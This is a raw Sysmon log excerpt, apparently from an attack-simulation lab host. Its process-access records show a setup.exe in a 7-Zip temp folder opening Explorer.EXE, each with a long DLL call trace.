10341000x800000000000000016126Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.911{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64) 10341000x800000000000000016125Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.911{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64) 10341000x800000000000000016124Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.911{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64)|C:\Windows\System32\windows.storage.dll+10c760(wow64)|C:\Windows\System32\windows.storage.dll+10a52d(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64) 10341000x800000000000000016123Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.911{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64)|C:\Windows\System32\windows.storage.dll+10c760(wow64)|C:\Windows\System32\windows.storage.dll+10a52d(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64) 10341000x800000000000000016122Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.911{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64) 10341000x800000000000000016121Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.911{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64) 10341000x800000000000000016120Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.911{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64)|C:\Windows\System32\windows.storage.dll+2da249(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64)|C:\Windows\System32\windows.storage.dll+10c760(wow64)|C:\Windows\System32\windows.storage.dll+10a52d(wow64) 10341000x800000000000000016119Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.911{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64)|C:\Windows\System32\windows.storage.dll+2da249(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64)|C:\Windows\System32\windows.storage.dll+10c760(wow64)|C:\Windows\System32\windows.storage.dll+10a52d(wow64) 10341000x800000000000000016118Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.911{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64)|C:\Windows\System32\windows.storage.dll+2da249(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64) 10341000x800000000000000016117Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.911{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64)|C:\Windows\System32\windows.storage.dll+2da249(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64) 10341000x800000000000000016116Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.911{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64)|C:\Windows\System32\windows.storage.dll+10a574(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000016115Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.911{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64)|C:\Windows\System32\windows.storage.dll+10a574(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000016114Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.911{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64)|C:\Windows\System32\windows.storage.dll+10a574(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64) 10341000x800000000000000016113Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.911{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64)|C:\Windows\System32\windows.storage.dll+10a574(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64) 10341000x800000000000000016112Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.896{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000016111Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.896{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000016110Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.896{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3 10341000x800000000000000016109Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.896{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64)|C:\Windows\System32\windows.storage.dll+